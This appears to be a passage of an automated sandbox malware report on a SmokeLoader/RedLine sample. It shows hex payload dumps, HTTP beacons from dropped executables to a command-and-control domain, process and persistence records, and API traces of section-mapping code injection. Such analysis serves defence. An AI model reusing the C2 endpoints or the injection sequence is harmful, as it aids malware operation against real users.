                          2024-08-06 12:48:59 UTC16384INData Raw: 89 11 3d f4 c5 54 f9 0f 83 5f 00 00 00 48 8b 45 90 48 89 45 c8 e9 00 00 00 00 48 8b 45 c8 48 89 85 80 00 00 00 48 8b 85 80 00 00 00 48 8d a5 98 00 00 00 5e 5d c3 22 84 2a ec e9 ca f5 ff ff 36 f8 4d 8f e9 47 f7 ff ff 26 16 76 ef e9 55 f9 ff ff 46 d4 cf 31 e9 5e fb ff ff cf b0 ce 2c e9 b2 fc ff ff 7e 25 be f7 e9 8a fd ff ff 8f 85 92 02 e9 f3 fe ff ff 66 66 2e 0f 1f 84 00 00 00 00 00 55 48 83 ec 60 48 8d 6c 24 60 48 89 4d f8 8b 0d 54 af 1c 00 81 f1 f7 b1 43 0d 8b 15 4c af 1c 00 89 c8 09 d0 83 f0 ff 09 d1 ba 4a 05 61 a8 81 f2 b5 fa 9e 57 31 d1 09 c8 b9 38 5c b9 6a 81 f1 c7 a3 46 95 31 c8 b9 6c 5a db 49 31 d2 f7 f1 35 0d 86 fa fb b9 15 c1 28 fa 81 f1 e5 2d ac ad 31 d2 f7 f1 b9 77 45 f5 0b 81 f1 2e a5 b4 e3 39 c8 0f 83 d3 02 00 00 48 8b 55 f8 8b 05 f1 ae 1c 00
                          Data Ascii: =T_HEHEHEHHH^]"*6MG&vUF1^,~%ff.UH`Hl$`HMTCLJaW18\jF1lZI15(-1wE.9HU
                          2024-08-06 12:48:59 UTC16384INData Raw: f1 cb 41 d6 fc 09 c8 3d b8 4d f2 9d 0f 83 0e 00 00 00 48 83 c4 58 c3 37 0f 77 0f e9 e0 fd ff ff 31 60 78 1d e9 a9 ff ff ff 0f 1f 80 00 00 00 00 55 48 81 ec 90 00 00 00 48 8d ac 24 80 00 00 00 48 89 55 d8 48 89 4d e0 b8 20 00 00 00 e8 8e 59 1c 00 48 29 c4 48 89 e0 48 89 45 e8 48 8b 01 48 89 45 f0 48 39 d0 0f 8e c4 00 00 00 8b 05 96 71 1c 00 8b 15 94 71 1c 00 41 b8 a1 86 99 7a 41 81 f0 a0 86 99 7a 89 c1 44 01 c1 83 f0 ff 09 d0 01 c8 b9 ff ff ff ff 81 f1 91 a2 68 5a 31 d2 83 ea 01 29 d1 29 c8 35 41 6a 09 ac b9 3b 29 a5 d9 31 d2 f7 f1 b9 22 e7 cf 90 81 f1 62 49 e3 b7 39 c8 0f 84 84 08 00 00 48 8b 4d e0 8b 05 40 71 1c 00 31 d2 f7 35 3c 71 1c 00 48 8b 55 d8 2d 69 45 ff 2e 41 b8 8e 42 ba 79 41 81 f0 e6 37 45 f2 44 29 c0 2d 29 26 ce f7 2d 17 66 15 e3 05 29 26 ce
                          Data Ascii: A=MHX7w1`xUHH$HUHM YH)HHEHHEH9qqAzAzDhZ1))5Aj;)1"bI9HM@q15<qHU-iE.AByA7ED)-)&-f)&
                          2024-08-06 12:48:59 UTC16384INData Raw: a7 81 f1 bd 8a 14 58 31 ca 89 c1 21 d1 89 c2 81 f2 4f e5 96 70 01 d0 29 c8 89 c2 83 f2 ff 81 e2 b1 d8 17 44 41 b8 5a ff 15 9e 41 81 f0 eb 27 02 da b9 bc fe f4 9b 81 f1 43 01 0b 64 41 31 c8 89 c1 44 21 c1 0f af ca 89 c2 81 e2 b1 d8 17 44 0d b1 d8 17 44 0f af c2 01 c8 89 44 24 20 4c 89 c1 4c 89 c2 e8 f2 1c ff ff 8b 44 24 20 3d 28 54 c8 de 0f 86 56 00 00 00 e9 22 00 00 00 4c 8b 44 24 30 48 8b 84 24 a8 00 00 00 48 8b 4c 24 28 48 83 c1 08 48 8b 10 48 83 c2 08 e8 4c b5 01 00 90 48 81 c4 b8 00 00 00 5f 5e c3 8e db 90 ef e9 25 f9 ff ff 66 aa 88 bf e9 f0 f9 ff ff 23 0d 95 95 e9 68 fb ff ff 79 61 8f ac e9 99 fd ff ff dc c5 14 02 e9 b7 fe ff ff 55 48 83 ec 10 48 8d 6c 24 10 48 89 55 f8 6a 10 58 e8 f4 18 1c 00 48 29 c4 48 8b 45 f8 48 89 e2 4c 8b 00 4c 89 02 48 8b 40
                          Data Ascii: X1!Op)DAZA'CdA1D!DDD$ LLD$ =(TV"LD$0H$HL$(HHHLH_^%f#hyaUHHl$HUjXH)HEHLLH@
                          2024-08-06 12:48:59 UTC16384INData Raw: 44 24 28 e9 00 00 00 00 48 8b 44 24 28 48 83 c4 68 c3 06 b7 51 20 e9 60 fd ff ff c6 3f 07 63 e9 9f fe ff ff 48 83 ec 38 48 89 c8 48 89 44 24 20 48 c7 01 00 00 00 00 48 c7 41 08 00 00 00 00 48 8b 02 48 89 44 24 28 48 8b 42 08 48 89 44 24 30 48 8d 54 24 28 e8 f6 b7 ff ff 48 8b 44 24 20 48 83 c4 38 c3 48 83 ec 38 48 89 4c 24 28 e8 76 bc fe ff 48 8b 4c 24 28 48 89 44 24 30 e8 9f 10 03 00 48 8b 44 24 30 80 78 60 00 0f 85 0a 00 00 00 48 8b 4c 24 28 e8 f5 12 03 00 90 48 83 c4 38 c3 48 83 ec 58 48 89 54 24 40 48 89 4c 24 48 4c 8b 01 31 c0 89 c1 48 83 e9 ff 4c 89 c0 48 29 c8 48 89 44 24 50 48 89 c1 48 83 f1 ff 48 89 c2 48 83 f2 ff 48 21 d1 4c 89 c2 48 09 d2 49 b9 79 23 21 e4 7d 37 fe cd 49 ba 86 dc de 1b 82 c8 01 32 4d 31 d1 4c 31 ca 48 09 d1 48 83 f1 ff 48 89 c2
                          Data Ascii: D$(HD$(HhQ `?cH8HHD$ HHAHHD$(HBHD$0HT$(HD$ H8H8HL$(vHL$(HD$0HD$0x`HL$(H8HXHT$@HL$HL1HLH)HD$PHHHHH!LHIy#!}7I2M1L1HHH
                          2024-08-06 12:48:59 UTC16384INData Raw: 3d 2d c0 33 50 c2 69 c0 4f 4f 17 cf 3d 9d c0 e3 1d 0f 86 1b 00 00 00 48 81 c4 80 00 00 00 5e c3 64 12 02 36 e9 f8 fb ff ff d7 19 5f e2 e9 1b fd ff ff 74 c1 70 98 e9 96 ff ff ff 0f 1f 44 00 00 48 83 ec 38 48 89 54 24 28 48 89 4c 24 30 8b 05 44 b8 1b 00 31 d2 f7 35 40 b8 1b 00 41 89 c0 44 89 c0 83 f0 ff 25 bd 47 b9 73 41 b9 ff ff ff ff 41 81 f1 bd 47 b9 73 45 21 c8 b9 ff ff ff ff 81 f1 06 c8 fc e5 81 e1 bd 47 b9 73 ba f3 17 3c fb 81 f2 f5 df c0 1e 44 21 ca 44 09 c0 09 d1 31 c8 2d 9a 03 ad 9d 25 40 69 0b fb 3d 8d 54 e8 be 0f 87 a8 00 00 00 48 8b 4c 24 30 8b 15 e0 b7 1b 00 23 15 de b7 1b 00 89 d0 09 c0 83 f0 ff 41 b8 84 a9 f7 7a 41 81 c8 84 a9 f7 7a 41 83 f0 ff 44 09 c0 83 f0 ff 41 b8 0b 52 62 82 41 81 f0 8f fb 95 f8 44 09 c2 83 f2 ff 83 f0 ff 83 f2 ff 21 d0
                          Data Ascii: =-3PiOO=H^d6_tpDH8HT$(HL$0D15@AD%GsAAGsE!Gs<D!D1-%@i=THL$0#AzAzADARbAD!


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.449757188.114.97.34435820C:\Users\user\AppData\Local\Temp\70C1.exe
                          TimestampBytes transferredDirectionData
                          2024-08-06 12:49:10 UTC359OUTPOST /dnbcompany_lt1jns?r8nly8r5hpamvqwa=wPH3ORWQpCff0Rbkjeq7BHUXYUTSjq2ZvEO74fzamCqz4bPud6wNFWcNcvb5H2uEbiUuLc8s9wrJ4LD3%2BwxZ6g%3D%3D HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
                          Content-Length: 96
                          Host: mundoparachicas.space
                          2024-08-06 12:49:10 UTC96OUTData Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 00 00 00 00 00 00 00 00 00 2d 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                          Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                          2024-08-06 12:49:11 UTC522INHTTP/1.1 204 No Content
                          Date: Tue, 06 Aug 2024 12:49:11 GMT
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qYxTjHACgf2helhJUzMTxJ40Z840w7tfHrQfyHVYurd4MLLYa1i1gOQNREmaRc8990AyzWKqAC%2BJ%2FlD%2FTdlz1QWkNSBgntioco08UNvhma9Q1yFMy8YUmqM1oyidaiG5LobPf0vSsLQ%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8aef2539da8d41b4-EWR
                          alt-svc: h3=":443"; ma=86400


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.449758188.114.97.34435312C:\Users\user\AppData\Local\Temp\AA31.exe
                          TimestampBytes transferredDirectionData
                          2024-08-06 12:49:18 UTC351OUTPOST /imageFolio.cgi?qehii0w3ze9sn=nO6wgakvlUvUKyvVvRezNJaB0mAvGbPqVKo12a3LOUvhvPrA9eFcs3uIBjr2ICTAiCiRSrnI1BD1Zngf6t0fTw%3D%3D HTTP/1.1
                          Connection: Keep-Alive
                          Accept: */*
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                          Content-Length: 96
                          Host: mundoparachicas.space
                          2024-08-06 12:49:18 UTC96OUTData Raw: fd ff ff ff 03 00 00 00 00 00 00 00 00 00 00 00 92 00 00 fe ff ff ff 2d 00 00 00 00 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                          Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                          2024-08-06 12:49:18 UTC524INHTTP/1.1 204 No Content
                          Date: Tue, 06 Aug 2024 12:49:18 GMT
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vkl9jwW8R6VtGA6e8vo6kbJ1%2Bok9scEzXOKfYwNXk0o%2Flf8Lz6mRQOyXtIhLIT7%2BImxaEQqewASM25QAG7QVRcjoWIuZs3KN9drdrSgo%2FRxGGmWt5KrP4olEFvINQthLha16T4uXMl0%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8aef2567ea6e4302-EWR
                          alt-svc: h3=":443"; ma=86400


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:08:47:52
                          Start date:06/08/2024
                          Path:C:\Users\user\Desktop\n72I7qB2ss.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\n72I7qB2ss.exe"
                          Imagebase:0x400000
                          File size:215'552 bytes
                          MD5 hash:A3F7B743EFAB28654F201A43A0E349C5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1768976686.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1769088650.000000000065B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1769015337.0000000000611000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1768940641.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:08:48:04
                          Start date:06/08/2024
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff72b770000
                          File size:5'141'208 bytes
                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:5
                          Start time:08:48:24
                          Start date:06/08/2024
                          Path:C:\Users\user\AppData\Roaming\ashcvvs
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\ashcvvs
                          Imagebase:0x400000
                          File size:215'552 bytes
                          MD5 hash:A3F7B743EFAB28654F201A43A0E349C5
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.2060795194.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2060983151.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.2060932056.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.2060868077.00000000006F9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 71%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          Target ID:6
                          Start time:08:48:52
                          Start date:06/08/2024
                          Path:C:\Users\user\AppData\Local\Temp\70C1.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Local\Temp\70C1.exe
                          Imagebase:0x7ff7dad60000
                          File size:2'064'896 bytes
                          MD5 hash:2B113C0906841F9AEAAFBD43C7CD37C4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 32%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          Target ID:7
                          Start time:08:48:59
                          Start date:06/08/2024
                          Path:C:\Users\user\AppData\Local\Temp\AA31.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Local\Temp\AA31.exe
                          Imagebase:0x7ff65b030000
                          File size:2'097'152 bytes
                          MD5 hash:85B1854B81D15AC9116AA200304D7CA0
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 54%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          Target ID:9
                          Start time:08:50:01
                          Start date:06/08/2024
                          Path:C:\Users\user\AppData\Roaming\ashcvvs
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\ashcvvs
                          Imagebase:0x400000
                          File size:215'552 bytes
                          MD5 hash:A3F7B743EFAB28654F201A43A0E349C5
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Reset < >

                            Execution Graph

                            Execution Coverage:5.3%
                            Dynamic/Decrypted Code Coverage:24.6%
                            Signature Coverage:48.5%
                            Total number of Nodes:134
                            Total number of Limit Nodes:5
                            execution_graph 5077 5d003c 5078 5d0049 5077->5078 5090 5d0e0f SetErrorMode SetErrorMode 5078->5090 5083 5d0265 5084 5d02ce VirtualProtect 5083->5084 5086 5d030b 5084->5086 5085 5d0439 VirtualFree 5089 5d04be LoadLibraryA 5085->5089 5086->5085 5088 5d08c7 5089->5088 5091 5d0223 5090->5091 5092 5d0d90 5091->5092 5093 5d0dad 5092->5093 5094 5d0dbb GetPEB 5093->5094 5095 5d0238 VirtualAlloc 5093->5095 5094->5095 5095->5083 5265 423b60 5266 423b6a __cfltcvt_init 5265->5266 5269 4246c7 GetModuleHandleA 5266->5269 5268 423b6f __setdefaultprecision 5270 4246d6 GetProcAddress 5269->5270 5271 424689 5269->5271 5270->5271 5271->5268 5209 401906 5210 40191c 5209->5210 5211 401941 Sleep 5210->5211 5212 40195c 5211->5212 5213 401513 7 API calls 5212->5213 5214 40196d 5212->5214 5213->5214 5152 403149 5153 403150 5152->5153 5154 4030fe RtlCreateUserThread NtTerminateProcess 5153->5154 5156 403157 5153->5156 5155 40312a 5154->5155 5272 65e30f 5273 65e313 5272->5273 5274 65e338 5273->5274 5275 65eac0 3 API calls 5273->5275 5275->5274 5157 402e8e 5160 402e86 5157->5160 5158 402f1f 5160->5158 5161 4018fa 5160->5161 5162 40190a 5161->5162 5163 401941 Sleep 5162->5163 5164 40195c 5163->5164 5166 40196d 5164->5166 5167 401513 5164->5167 5166->5158 5168 401522 5167->5168 5169 4015c1 NtDuplicateObject 5168->5169 5173 4016dd 5168->5173 5170 4015de NtCreateSection 5169->5170 5169->5173 5171 401604 NtMapViewOfSection 5170->5171 5172 40165e NtCreateSection 5170->5172 5171->5172 5174 401627 NtMapViewOfSection 5171->5174 5172->5173 5175 40168a 5172->5175 5173->5166 5174->5172 5176 401645 5174->5176 5175->5173 5177 401694 NtMapViewOfSection 5175->5177 5176->5172 5177->5173 5178 4016bb NtMapViewOfSection 5177->5178 5178->5173 5096 423af0 5099 42379f 5096->5099 5098 423af5 5100 4237af 5099->5100 5101 42381f GetLogicalDriveStringsW DeleteVolumeMountPointW GetCommandLineA 5100->5101 5102 42383d 5100->5102 5101->5100 5103 42384a 11 API calls 5102->5103 5104 423948 5102->5104 5106 423902 GetDefaultCommConfigA DebugBreak EnumDateFormatsW 5103->5106 5105 42394a SetCommMask GetTickCount GetSystemTimes 5104->5105 5108 42397d 5104->5108 5105->5104 5107 42397f 5105->5107 5110 42392a 5106->5110 5107->5108 5109 423988 FoldStringW 5107->5109 5111 4239a0 OpenWaitableTimerA HeapLock FormatMessageW 5108->5111 5112 423a41 GlobalAlloc 5108->5112 5109->5108 5110->5104 5115 4239ec 5111->5115 5113 423a86 LoadLibraryA 5112->5113 5114 423a5f 5112->5114 5122 423485 5113->5122 5114->5113 5115->5112 5119 423a9b 5127 42370a 5119->5127 5121 423aa0 5121->5098 5123 4234c4 5122->5123 5124 4234d0 GetModuleHandleW GetProcAddress 5123->5124 5125 4235a6 5123->5125 5124->5123 5126 423467 VirtualProtect 5125->5126 5126->5119 5128 423736 GetFullPathNameW 5127->5128 5129 42374a 5127->5129 5128->5129 5138 4235e6 5129->5138 5132 423766 5141 423635 5132->5141 5133 42375f FreeEnvironmentStringsW 5133->5132 5136 423790 5136->5121 5137 42377b HeapCreate SetFileShortNameA 5137->5136 5139 42360a GetCommProperties LoadLibraryA 5138->5139 5140 42361e 5138->5140 5139->5140 5140->5132 5140->5133 5142 423664 5141->5142 5144 4236e4 5142->5144 5145 4236a5 SetCalendarInfoW OpenJobObjectA GetShortPathNameA Sleep 5142->5145 5146 42362a 5142->5146 5144->5136 5144->5137 5145->5142 5149 4235a9 5146->5149 5150 4235c5 VirtualUnlock 5149->5150 5151 4235cf 5149->5151 5150->5151 5151->5142 5276 402fd3 5277 40312a 5276->5277 5278 402ffd 5276->5278 5278->5277 5279 4030fe RtlCreateUserThread NtTerminateProcess 5278->5279 5279->5277 5261 402e35 5263 402e6f 5261->5263 5262 402f1f 5263->5262 5264 4018fa 8 API calls 5263->5264 5264->5262 5245 5d092b GetPEB 5246 5d0972 5245->5246 5221 40151e 5222 40154c 5221->5222 5223 4015c1 NtDuplicateObject 5222->5223 5227 4016dd 5222->5227 5224 4015de NtCreateSection 5223->5224 5223->5227 5225 401604 NtMapViewOfSection 5224->5225 5226 40165e NtCreateSection 5224->5226 5225->5226 5228 401627 NtMapViewOfSection 5225->5228 5226->5227 5229 40168a 5226->5229 5228->5226 5230 401645 5228->5230 5229->5227 5231 401694 NtMapViewOfSection 5229->5231 5230->5226 5231->5227 5232 4016bb NtMapViewOfSection 5231->5232 5232->5227 5179 65e31a 5182 65e320 5179->5182 5183 65e32f 5182->5183 5186 65eac0 5183->5186 5188 65eadb 5186->5188 5187 65eae4 CreateToolhelp32Snapshot 5187->5188 5189 65eb00 Module32First 5187->5189 5188->5187 5188->5189 5190 65e31f 5189->5190 5191 65eb0f 5189->5191 5193 65e77f 5191->5193 5194 65e7aa 5193->5194 5195 65e7bb VirtualAlloc 5194->5195 5196 65e7f3 5194->5196 5195->5196

                            Control-flow Graph

                            APIs
                            • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00423821
                            • DeleteVolumeMountPointW.KERNEL32(00000000), ref: 00423828
                            • GetCommandLineA.KERNEL32 ref: 0042382E
                            • lstrcatW.KERNEL32(?,00000000), ref: 00423853
                            • InterlockedExchange.KERNEL32(?,00000000), ref: 0042385F
                            • GetActiveWindow.USER32 ref: 00423865
                            • GetSystemWindowsDirectoryW.KERNEL32(?,00000000), ref: 00423874
                            • WriteConsoleW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042388A
                            • IntersectRect.USER32(?,?,00000000), ref: 0042389B
                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 004238A4
                            • GetAtomNameA.KERNEL32(00000000,?,00000000), ref: 004238B4
                            • GlobalDeleteAtom.KERNEL32(00000000), ref: 004238BB
                            • GetCurrentConsoleFont.KERNEL32(00000000,00000000,?), ref: 004238C8
                            • SearchPathA.KERNEL32(0042852C,00428518,004284E4,00000000,?,?), ref: 004238EB
                            • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 0042390C
                            • DebugBreak.KERNEL32 ref: 00423912
                            • EnumDateFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0042391B
                            • SetCommMask.KERNELBASE(00000000,00000000), ref: 0042394C
                            • GetTickCount.KERNEL32 ref: 00423952
                            • GetSystemTimes.KERNELBASE(?,?,?), ref: 00423967
                            • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0042398D
                            • OpenWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 004239AF
                            • HeapLock.KERNEL32(00000000), ref: 004239B6
                            • FormatMessageW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004239CA
                            • GlobalAlloc.KERNELBASE(00000000), ref: 00423A48
                            • LoadLibraryA.KERNELBASE(00428574), ref: 00423A8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768787533.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00416000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_416000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: AtomCommConsoleDeleteGlobalSystem$ActiveAllocBreakCacheCommandConfigCountCurrentDateDebugDefaultDirectoryDriveEnumExchangeFlushFoldFontFormatFormatsHeapInstructionInterlockedIntersectLibraryLineLoadLockLogicalMaskMessageMountNameOpenPathPointRectSearchStringStringsTickTimerTimesVolumeWaitableWindowWindowsWritelstrcat
                            • String ID: VirtualProtect$}$
                            • API String ID: 693232001-3575559497
                            • Opcode ID: 458ea9c994ca7e43693011cce1549fc3b33e6df546367350751d41966682c02c
                            • Instruction ID: 8dbc5d9f7ccbc57e8f3c20c9d260084f9863f046cce8ff7655e10ccfc7c1cc5d
                            • Opcode Fuzzy Hash: 458ea9c994ca7e43693011cce1549fc3b33e6df546367350751d41966682c02c
                            • Instruction Fuzzy Hash: B8819072606130AFC721AF61EC49C9F7BACEF4A355B80443AF585D2161DB3C4646CBAE

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 145 401513-401546 152 401555 145->152 153 40154c-40156b call 401196 145->153 152->153 157 401570-401575 153->157 158 40156d 153->158 160 40157b-40158c 157->160 161 40189d-4018a5 157->161 158->157 164 401592-4015bb 160->164 165 40189b-4018bf 160->165 161->157 164->165 173 4015c1-4015d8 NtDuplicateObject 164->173 169 4018b0-4018bb 165->169 170 4018c2-4018d4 165->170 169->170 174 4018d7 170->174 175 4018ca-4018d0 170->175 173->165 176 4015de-401602 NtCreateSection 173->176 177 4018eb 174->177 178 4018df-4018f7 call 401196 174->178 175->174 180 401604-401625 NtMapViewOfSection 176->180 181 40165e-401684 NtCreateSection 176->181 177->178 180->181 183 401627-401643 NtMapViewOfSection 180->183 181->165 184 40168a-40168e 181->184 183->181 186 401645-40165b 183->186 184->165 187 401694-4016b5 NtMapViewOfSection 184->187 186->181 187->165 188 4016bb-4016d7 NtMapViewOfSection 187->188 188->165 190 4016dd call 4016e2 188->190
                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
                            Similarity
                            • API ID: Section$View$Create$DuplicateObject
                            • String ID:
                            • API String ID: 1546783058-0
                            • Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
                            • Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
                            • Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
                            • Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 192 40151e-40156b call 401196 197 401570-401575 192->197 198 40156d 192->198 200 40157b-40158c 197->200 201 40189d-4018a5 197->201 198->197 204 401592-4015bb 200->204 205 40189b-4018bf 200->205 201->197 204->205 213 4015c1-4015d8 NtDuplicateObject 204->213 209 4018b0-4018bb 205->209 210 4018c2-4018d4 205->210 209->210 214 4018d7 210->214 215 4018ca-4018d0 210->215 213->205 216 4015de-401602 NtCreateSection 213->216 217 4018eb 214->217 218 4018df-4018f7 call 401196 214->218 215->214 220 401604-401625 NtMapViewOfSection 216->220 221 40165e-401684 NtCreateSection 216->221 217->218 220->221 223 401627-401643 NtMapViewOfSection 220->223 221->205 224 40168a-40168e 221->224 223->221 226 401645-40165b 223->226 224->205 227 401694-4016b5 NtMapViewOfSection 224->227 226->221 227->205 228 4016bb-4016d7 NtMapViewOfSection 227->228 228->205 230 4016dd call 4016e2 228->230
                            APIs
                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1768768688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_n72I7qB2ss.jbxd
